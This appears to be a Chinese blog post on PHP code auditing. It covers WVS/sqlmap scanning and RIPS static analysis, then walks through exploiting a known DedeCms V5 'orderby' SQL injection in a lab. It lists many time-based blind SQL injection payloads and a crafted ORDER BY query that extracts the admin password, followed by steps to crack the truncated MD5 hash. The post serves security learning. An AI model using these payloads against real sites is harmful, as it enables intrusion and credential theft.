关于PHP代码审计和漏洞挖掘的一点思考
这里对PHP的代码审计和漏洞挖掘的思路做一下总结,都是个人观点,有不对的地方请多多指出。
PHP的漏洞有很大一部分是来自于程序员本身的经验不足,当然和服务器的配置有关,但那属于系统安全范畴了,我不太懂,今天我想主要谈谈关于PHP代码审计和漏洞挖掘的一些思路和理解。
PHP的漏洞发掘,其实就是web的渗透测试,和客户端的fuzzing测试一样,web的渗透测试也可以使用类似的技术,web fuzzing,即基于web的动态扫描。
这类软件国内外有很多,如WVS,Lan Guard,SSS等。这类扫描器的共同特点都是基于蜘蛛引擎对我们给出的URL地址进行遍历搜索,对得到的URL和参数进行记录,然后使用本地或者web端的script脚本攻击语句进行攻击测试。
如:
http://www.foo.com/index.php?parm1=1&parm2=2&parm3=3.....&parmn=n
….
WVS使用本地的脚本攻击数据库对这些参数进行交叉替换和填充,构造出新的URL,然后用GET或者POST的方式向服务器发出请求,并对返回的结果进行正则判断。
如是否出现:” ou have an error in your SQL syntax”等字样。如果出现,则记录下来,说明这个脚本页面”可能”存在漏洞。
WVS把攻击分成了很多模块:
1. Blind_SQL_Injection
2. AcuSensor
3. CSRF
4. Directory_And_File_Check
5. File_Upload
6. GHDB(Google黑客数据库)
7. Sql_Injection
8. Weak_Password
9. XSS
每种攻击测试方式都对应着一类scripts,里面包含了攻击语句。
用WVS扫描完之后,如果能发现一些sql注入点的提示,这个时候可以先用sqlmap进行注入尝试,进一步判断注入点的情况。
http://hi.baidu.com/306211321/item/b4b2ea1f75db1dea9913d659
如果这两步都不能成功,说明基于fuzz的动态扫描不能继续下去了,这个时候,我们应该想办法进行静态的代码审计,从源代码的角度分析和挖掘漏洞的成因和利用方式。这块可以使用RIPS这样的软件,RIPS是一款专门用来进行静态PHP代码审计的工具,能够帮助我们定位到可能存在漏洞的代码区域。
RIPS对代码进行静态漏洞扫描的基本思想有两条:
- 对容易产生漏洞的函数进行跟踪(例如:mysql_query())
RIPS认为,所有的注入漏洞最终都要经过一些特定的数据库操作函数,mysql_query()或程序自定义的类函数,这些函数是产生漏洞的导火索,只要对这些函数的控制流和参数流进行回溯扫描,就可以发现大部分的代码漏洞。
- 对产生注入漏洞的源头即用户传输过来的数据流进行跟踪($_GET,$_POST,$_COOKIE)
“用户输入的一切数据都有害”,大部分的注入漏洞,包括二次注入,究其原因都是因为对用户的输入数据没有做好过滤,RIPS对这些敏感数据进行跟踪,并判断其在进入敏感函数(mysql_query())之前有没有对其进行有效处理(addslashes())来判断这条数据流是否存在漏洞。
动态扫描加上静态定位,最终使我们能更容易的发现一些漏洞并及时使其得到修补。
接下来,我们来针对一个已知的漏洞进行一次分析。
DedeCms V5 orderby参数注射漏洞
SSV-ID:3824
SSV-AppDir:织梦
URL:http://sebug.net/vuldb/ssvid-3824
- 动态扫描
架设好服务器和网站后,我们使用WVS对网站的根目录进行扫描,因为我们现在是黑盒测试,所以直接从网站根目录开始扫描。
等待一段时间后,扫描结果出来了,得到一些疑似SQL注入的URL。这里研究一下WVS的注入测试原理是什么,通过查看apache的access.log。我们发现了一下请求(无关部分已经删除)。
id=-1&page=1
id=-1 or 1*71=71&page=1
id=-1 or 71=0&page=1
id=-1' or 5=5 or '39'='39&page=1
id=-1' or '39'='0&page=1
id=IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR"*/&page=1
id=com_virtuemart' and sleep(2.09)='&page=1
id=com_virtuemart' and (sleep(2.09)+1) limit 1 -- &page=1
id=com_virtuemart'=sleep(2.09)='&page=1
id=com_virtuemart"=sleep(2.09)="&page=1
id=com_virtuemart'+(select 1 from (select sleep(2.09))A)+'&page=1
id=com_virtuemart and sleep(2.09) &page=1
id=com_virtuemart or (sleep(2.09)+1) limit 1 -- &page=1
id=com_virtuemart';select pg_sleep(2.09); -- &page=1
id=com_virtuemart'; waitfor delay '0:0:2.09' -- &page=1
id=com_virtuemart"; waitfor delay '0:0:2.09' -- &page=1
id=com_virtuemart&page=-1 or 1*22=22
id=com_virtuemart&page=-1 or 22=0
id=com_virtuemart&page=-1' or 5=5 or '56'='56
id=com_virtuemart&page=-1' or '56'='0
id=com_virtuemart&page=-1" or 5=5 or "39"="39
id=com_virtuemart&page=-1" or "39"="0
id=com_virtuemart&page=IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR"*/
id=com_virtuemart&page=1 and sleep(2)
id=com_virtuemart&page=1 or (sleep(2)+1) limit 1 --
id=com_virtuemart&page=1' and sleep(2)='
id=com_virtuemart&page=1' and sleep(0)='
id=com_virtuemart&page=1' and (sleep(2)+1) limit 1 --
id=com_virtuemart&page=1' or (sleep(2)+1) limit 1 --
id=com_virtuemart&page=1" or (sleep(2)+1) limit 1 --
id=com_virtuemart&page=1" or (sleep(0)+1) limit 1 --
id=com_virtuemart&page=1'=sleep(2)='
id=com_virtuemart&page=1"=sleep(2)="
id=com_virtuemart&page=1'+(select 1 from (select sleep(2))A)+'
id=com_virtuemart&page=1;select pg_sleep(2); --
id=com_virtuemart&page=1';select pg_sleep(2); --
id=com_virtuemart&page=1; waitfor delay '0:0:2' --
id=com_virtuemart&page=1'; waitfor delay '0:0:2' --
id=com_virtuemart&page=1"; waitfor delay '0:0:2' --
可以看到,WVS采用的是一种基于时间延迟的盲注入测试技术。
http://www.4ngel.net/article/49.htm
盲注入的利用关键是要找到一个二值逻辑的判断,即需要对不同的输入有不同的返回结果,我们才能借助推理得到一些信息,但是有时候,盲注入得到的结果并不会在UI上显示出来,这样就回导致我们注入失败,但是采用时间延迟的思想就可以很好的避免这个问题,从而能够对不同的程序具有很好的适应性。
- 注入点探测
得到WVS的扫描结果后,我们需要对可能存在注入的URL进行注意排查,以确定是否真的存在注入漏洞。
我们选取:
http://192.168.174.131/index.php?option=com_virtuemart&page=1
这是dedecms的一个留言板的脚本页面:
使用sqlmap对疑似注入点进行探测:
python sqlmap.py -u "http://192.168.174.131/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=1" --current-db
扫描的结果没有成功,又手工尝试了union selct和order by1,2,3..等注入方式,貌似不能获得盲注入的效果。
不成功的原因有很多,我自己根据经验总结了几点:
触发实际的sql注入漏洞之前要
1. 先获取cookie值(如果没有cookie值很多时候会被直接弹出到首页,没法进入到一些深层次的代码逻辑)
2. 获取formhash(防止CSRF的)
3. 对POST或GET或cookie中的某个字段进行某种编码(base64等)
4. 特殊字符(%cf宽字符)注入等
5. 结合POST或COOKIE的变量覆盖的sql注入
6. 盲注入sql语句构造的特殊性
这些先验条件有时候就会称为漏洞触发和利用的关键。
这个时候用自动化工具进行测试的工作基本做完了,我们接下来要使用RIPS来对源代码进行白盒分析,因为目标系统是开源的cms系统,我们可以很容易的从网上下载到全部源代码。
使用RIPS对cms的整站源代码进行扫描
RIPS扫描出了很多文件,有些是因为交叉引用,有些是真正存在漏洞的代码的。
我们来到: /member/guestbook_admin.php
来分析以下代码漏洞
//重载列表
if($dopost=='getlist'){
PrintAjaxHead();
GetList($dsql,$pageno,$pagesize,$orderby);
$dsql->Close();
exit();
.........
//获得特定的关键字列表
//---------------------------------
function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){
global $cfg_phpurl,$cfg_ml;
$jobs = array();
$start = ($pageno-1) * $pagesize;
$dsql->SetQuery("Select * From #@__jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");
$dsql->Execute();
while($row = $dsql->GetArray()){
$row['endtime'] = @ceil(($row['endtime']-$row['pubdate'])/86400);
if($row['salaries'] == 0){
$row['salaries'] = '薪酬面议';
}
$jobs[] = $row;
}
foreach($jobs as $job)
{
//模板文件
include(dirname(__FILE__)."/templets/job.htm");
}
可以看到,代码在编写的时候,并没有对orderby这个参数进行过滤。导致了注入和畸形数据报错,接下来,我们的任务就是要利用这个漏洞进行有效的注入,获得数据。
我们手工构造一个注入:
我们手动构造一个sql注入
对应的sql语句:
Select * From dede_member_guestbook where mid='1' order by mid and if(ASCII(SUBSTRING((select pwd from dede_admin where id=1),1,1))=55,1,(select pwd from dede_member));
这样不能成功,因为sql语句的语法是这样的;
SELECT select_list
[ INTO new_table ]
FROM table_source
[ WHERE search_condition ]
[ GROUP BY group_by_expression ]
[ HAVING search_condition ]
[ ORDER BY order_expression [ ASC | DESC ] ]
而我们在能控制的参数是order by参数,在where后面,我发现这个时候不管and逻辑的true or false都不影响sql的查询结果。
转换一下思路:
对应的sql语句:
Select * From dede_member_guestbook where mid='1' order by mid,if(ASCII(SUBSTRING((select pwd from dede_admin where id=1),1,1))=55,1,(select pwd from dede_member)) asc;
这个语句貌似可以利用,因为在标准的sql语法中。在order by后面再加and是没有用的。但是这里用了逗,也就是if后面的语句也属于order by的一部分了。再在最后加上一个asc,盲注入就成功了。
在+asc后面加上--注释号,来屏蔽掉后面的desc limit 0,5。
整个语句就能跑通了。
根据返回的结果的不一致,利用正则判断一下,就可以利用盲注入进行帐号和密码的猜测。从而获得后台权限。
然后dede的密码存放机制是产生32位的MD5后,截断前24位,所以得到的hash只有24位,没法用cmd5.com直接破解
http://www.2cto.com/Article/201203/123709.html
698d51a19d8a121ce581499d,去掉前8位
9d8a121ce581499d
转换成15位MD5,再用cmd5.com来解密,成功
总结:
Web渗透和代码审计的第一步是对网站的fuzz测试,这可以从整体上对网站的漏洞情况进行扫描,缩小范围。
对漏洞的具体挖掘和利用还是要使用白盒分析,即源代码分析,这样才能更有效的针对不同的代码情况指定出漏洞利用方案。
介绍一些web fuzzing的工具。
Browser Fuzzer 3 (bf3) – Comprehensive Web Browser Fuzzing Tool
MantraPortable --- OWASP的一款渗透测试套件
Webshag v1.00 – Web Server Auditing Tool (Scanner and File Fuzzer)
Wfuzz – A Tool for Bruteforcing/Fuzzing Web Applications
WVS
LAN Guard
SQLmap
刚开始接触代码审计这块,懂得不是很多,就说了一些平时玩的过程中的理解和观点,希望大神路过能多多指导指导,我会继续学习这方面的知识的。
关于PHP代码审计和漏洞挖掘的一点思考的更多相关文章
- [网站安全] [实战分享]WEB漏洞挖掘的一些经验分享
WEB漏洞有很多种,比如SQL注入,比如XSS,比如文件包含,比如越权访问查看,比如目录遍历等等等等,漏洞带来的危害有很多,信息泄露,文件上传到GETSHELL,一直到内网渗透,这里我想分享的最主要的 ...
- ref:PHP反序列化漏洞成因及漏洞挖掘技巧与案例
ref:https://www.anquanke.com/post/id/84922 PHP反序列化漏洞成因及漏洞挖掘技巧与案例 一.序列化和反序列化 序列化和反序列化的目的是使得程序间传输对象会更加 ...
- php漏洞挖掘书籍
PHP是一种被广泛使用的脚本语言,尤其适合web开发.具有跨平台,容易学习,功能强大等特点,据统计全世界超过34%的网站有php的应用,包括Yahoo.sina.163.sohu等大型门户网站.而且很 ...
- PHP代码审计4-漏洞挖掘思路
漏洞挖掘思路 漏洞形成的条件 1.变量可控制 2.变量可到达有利用价值的函数(危险函数) 漏洞造成的效果 漏洞的利用效果取决于最终的函数功能,变量进入什么样的函数就导致什么样的效果 危险函数 文件包含 ...
- Vuzzer自动漏洞挖掘工具简单分析附使用介绍
Vuzzer 是由计算机科学机构 Vrije Universiteit Amsterdam.Amsterdam Department of Informatics 以及 International ...
- SRC漏洞挖掘
SRC目标搜集 文章类的平台 https://www.anquanke.com/src 百度搜索 首先得知道SRC厂商的关键字,利用脚本搜集一波. 比如[应急响应中心]就可以作为一个关键字.通过搜索引 ...
- D-Link系列路由器漏洞挖掘
参考 http://www.freebuf.com/articles/terminal/153176.html https://paper.seebug.org/429/ http://www.s3c ...
- D-Link系列路由器漏洞挖掘入门
D-Link系列路由器漏洞挖掘入门 前言 前几天去上海参加了geekpwn,看着大神们一个个破解成功各种硬件,我只能在下面喊 6666,特别羡慕那些大神们.所以回来就决定好好研究一下路由器,争取跟上大 ...
- (转) exp1-1:// 一次有趣的XSS漏洞挖掘分析(1)
from http://www.cnblogs.com/hookjoy/p/3503786.html 一次有趣的XSS漏洞挖掘分析(1) 最近认识了个新朋友,天天找我搞XSS.搞了三天,感觉这一套 ...
随机推荐
- 代码整洁--使用CodeMaid自动程序排版
在项目开发的过程中,如果只是验证命名规则.而没有统一程序排版,项目中很容易就会出现类似下列范例的程序代码产出.这样的产出,虽然能够正常地提供项目功能.并且符合微软的命名规则,但是因为程序排版凌乱的问题 ...
- 认识HTML5的WebSocket
在HTML5规范中,我最喜欢的Web技术就是正迅速变得流行的WebSocket API.WebSocket提供了一个受欢迎的技术,以替代我们过去几年一直在用的Ajax技术.这个新的API提供了一个方法 ...
- 告别编译运行 ---- Android Studio 2.0 Preview发布Instant Run功能
以往的Android开发有一个头疼的且拖慢速度的问题,就是你每改一行代码要想看到结果必须要编译运行到手机或者模拟器上,而且需要从头(可能是登录界面)一直点击到你修改的界面为止.开发一个完整的Andro ...
- MVC-通过对象获取整个表单内容
-------- 在MVC的Controller(控制器)里面定义相同的方法时,我们需要解决重载问题: 解决方案一:在参数中定义一个FormCollection类型,解决问题 [HttpSet] pu ...
- shell正则表达式(zhuan)
匹配中文字符的正则表达式:[u4e00-u9fa5] 评注:匹配中文还真是个头疼的事,有了这个表达式就好办了 匹配双字节字符(包括汉字在内):[^x00-xff] 评注:可以用来计算字符串的长度(一个 ...
- 东大OJ-5到100000000之间的回文质数
1217: VIJOS-P1042 时间限制: 0 Sec 内存限制: 128 MB 提交: 78 解决: 29 [提交][状态][讨论版] 题目描述 有一天,雄霸传授本人风神腿法 ...
- Android出现错误后改正后仍显示错误
今天编Android的时候,layout.xml出现了错误,改正后仍显示错误.试了很多方法. 后来,将原来的复制并删掉,然后再粘贴上去就可以了.
- python环境搭建-Linux系统下python2.6.6升级python3.5.2步骤
[root@template ~]# python -v # /usr/lib64/python2.6/encodings/utf_8.pyc matches /usr/lib64/python2.6 ...
- 【hihoCoder 1036】Trie图
看了一下简单的$Trie图$,调模板调啊调一连调了$2h$,最后发现$-'a'$打成$-'A'$了hhh,有种摔键盘的冲动. $Trie图$是$Trie树$上建立“前缀边”,不用再像在$Trie树$上 ...
- JS自动填写分号导致的坑
JS中会自动清除句子和句子之间的空格以及tab缩进, 这样就可以允许用户编写的代码更加随性和更加可读, 在该行代码解析的时候如果该行代码可以解析, 就会在该行代码最后自动填写分号,如果该行代码无法解析 ...